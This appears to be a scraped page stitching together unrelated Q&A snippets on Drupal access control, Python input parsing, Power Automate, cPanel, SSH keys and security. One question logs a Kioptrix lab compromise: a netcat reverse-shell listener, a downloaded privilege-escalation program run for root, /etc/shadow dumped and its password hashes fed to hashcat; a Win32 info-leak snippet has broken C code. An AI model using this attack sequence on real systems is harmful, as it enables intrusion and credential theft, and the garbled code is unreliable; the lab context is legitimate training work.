8 – Auuopopulate a content type with user information

I have a custom content type. I have created users using Add users.

I need to create a page with a search box for the username. After selecting the username, I need to be directed to the content type with user data auto-populated. The user data is already added with Add user.

How do I do both of this? I have been suggested to write a query, but I haven’t been able to grasp the concept.

Prevent logged in users from seeing other registered users information

I’m using Drupal 8 and I have a security requirement to prevent authenticated users from seeing other authenticated users’ profiles.

I have a view which customizes the user profile page of each authenticated user. Each logged in user can see their own profile by accessing the path /user-profile/userId.

Now if the user decided to randomly change the userId in the URL, they cannot access other users’ profiles, since, in the view I have set the ‘Filter Criteria’ to current user. Which works perfectly.

However, if a user decided to randomly change the userId in the path /user/userId they will have access to other users information. What I need to do is to prevent them from accessing /user/userId.

It’s important to mention that the users are free to change their own information using the URL /user/userId/edit

Any suggestions?

python – How to separate information within 1 line of user input? (Python3)

I want to know how to separate information within 1 line of user input using Python3. For example, the user types

5 1 7 8 12 13

The 5 represents the number of numbers that follow, and I want to store those numbers (1, 7, 8, 12, 13) in 1 array as integers. I have tried splitting off each number as a String and then casting it as an int, but this doesn’t work well if the input line contains two (or possibly more) digit numbers.

sharepoint online – Can I gather information (like email addresses) from flow initiator when launching flow in Power Automate?

This can be done when the flow is triggered for the selected item or document. (Also for a manually triggered flow, but you are talking about SharePoint libraries, so I’ll focus on that.)

In the Flow portal, create a new flow with “Instant > From Blank”. Then in the dialog where you choose how to trigger this flow, select “For a selected file” and click Create.

enter image description here

In the initiation action, specify the site address and library name, then click Add an input.
The “Email” option is really a people picker control. When the flow is launched you can only select people from your tenant. The other options should be self-explanatory.

enter image description here

You can then find the input name in the dynamic content picker for subsequent actions.

enter image description here

When you publish the flow, you need to define the Run-Only users on the flow details page. These people will then see the flow in the “Automate” menu on their SharePoint command bar when a single document is selected.

Hide “Server information” in cPanel


Quote Originally Posted by serverman12
View Post
Hi,

I want to hide the “Server information” link in client’s cPanel: https://ibb.co/J5NcG0H

How can i do this?, for the users cannot see technical information.

Thank you very much.

Why do you want to hide that information?

Feature Manager -> Packages -> Edit Feature List -> Uncheck Server Status Viewer -> Save.

hashcat: No hashes loaded – Information Security Stack Exchange

I’ve been trying Kioptrix: Level 1.1 (#2) and managed to get root access.
https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

wolf@linux:~$ nc -vklp 8080
listening on (any) 8080 ...
10.10.10.10: inverse host lookup failed: Unknown host
connect to (10.10.10.99) from (UNKNOWN) (10.10.10.10) 32795

id
uid=48(apache) gid=48(apache) groups=48(apache)

cd /tmp
wget http://10.10.10.99/privesc.c
ls
privesc.c
gcc privesc.c -o privesc
./privesc

id
uid=0(root) gid=0(root) groups=48(apache)

cat /etc/passwd
cat /etc/shadow

unshadow file = md5.txt

wolf@linux:~$ cat md5.txt 
root:$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.:0:0:root:/root:/bin/bash
john:$1$wk7kHI5I$2kNTw6ncQQCecJ.5b8xTL1:500:500::/home/john:/bin/bash
harold:$1$7d.sVxgm$3MYWsHDv0F/LP.mjL9lp/1:501:501::/home/harold:/bin/bash
wolf@linux:~$ 

However, I’m having a problem sending the unshadow file md5.txt to hashcat.

Any idea what’s wrong with this?

wolf@linux:~$ hashcat -m 0 -a 0 md5.txt rockyou.txt
hashcat (v4.0.1) starting...

* Device #1: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
nvmlDeviceGetFanSpeed(): Not Supported

OpenCL Platform #1: NVIDIA Corporation
======================================

Hashfile 'md5.txt' on line 1 (root:$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.:0:0:root:/root:/bin/bash): Line-length exception
Hashfile 'md5.txt' on line 2 (john:$1$wk7kHI5I$2kNTw6ncQQCecJ.5b8xTL1:500:500::/home/john:/bin/bash): Line-length exception
Hashfile 'md5.txt' on line 3 (harold:$1$7d.sVxgm$3MYWsHDv0F/LP.mjL9lp/1:501:501::/home/harold:/bin/bash): Line-length exception
Parsing Hashes: 0/3 (0.00%)...No hashes loaded.

Started: Mon May 25 01:17:21 2020
Stopped: Mon May 25 01:17:21 2020
wolf@linux:~$ 

Update

I’ve also tried with md5 hash only instead of unshadow file, but still didn’t work.

md5 hash only

wolf@linux:~$ cat md5only.txt 
$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.
$1$wk7kHI5I$2kNTw6ncQQCecJ.5b8xTL1
$1$7d.sVxgm$3MYWsHDv0F/LP.mjL9lp/1
wolf@linux:~$ 

Still getting the same Line-length exception, (0.00%)...No hashes loaded error.

wolf@linux:~$ hashcat -m 0 -a 0 md5only.txt rockyou.txt
hashcat (v4.0.1) starting...

* Device #1: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
nvmlDeviceGetFanSpeed(): Not Supported

OpenCL Platform #1: NVIDIA Corporation
======================================

Hashfile 'md5only.txt' on line 1 ($1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.): Line-length exception
Hashfile 'md5only.txt' on line 2 ($1$wk7kHI5I$2kNTw6ncQQCecJ.5b8xTL1): Line-length exception
Hashfile 'md5only.txt' on line 3 ($1$7d.sVxgm$3MYWsHDv0F/LP.mjL9lp/1): Line-length exception
Parsing Hashes: 0/3 (0.00%)...No hashes loaded.

Started: Mon May 25 03:10:03 2020
Stopped: Mon May 25 03:10:03 2020
wolf@linux:~$ 

windows 10 – what is an example of out of bounds read in order to leak sensitive information?

I Am trying to understand a little bit better behind the scenes on bypassing aslr by reading the bytes in the memory of a process, but how can I make an example of an info leak in WIN32? my code does the leaks of bytes , but how can I check the image base based on those bytes?

#include <stdio.h>
#include <string.h>

int main(int argc, char **argv) {
    char a(16);

    strncpy(a, "0123456789abcdef", sizeof(a));

    //... lots of code passes, functions are called...
    //... we finally come back to array a ...

    printf("%sn", a);
}

ssh – Find information about host/user by his public key?

Say, I was reviewing my log files and noticed that someone with certain public key tried to connect to my server and got access denied (because his public key is not in my authorized_keys file).

May I somehow gather more information about user/host with this associated public keys? For example, this key may be attached to Github profile and I can filter Github users by public keys and find the one that used to attempt to login into my server?

Thanks!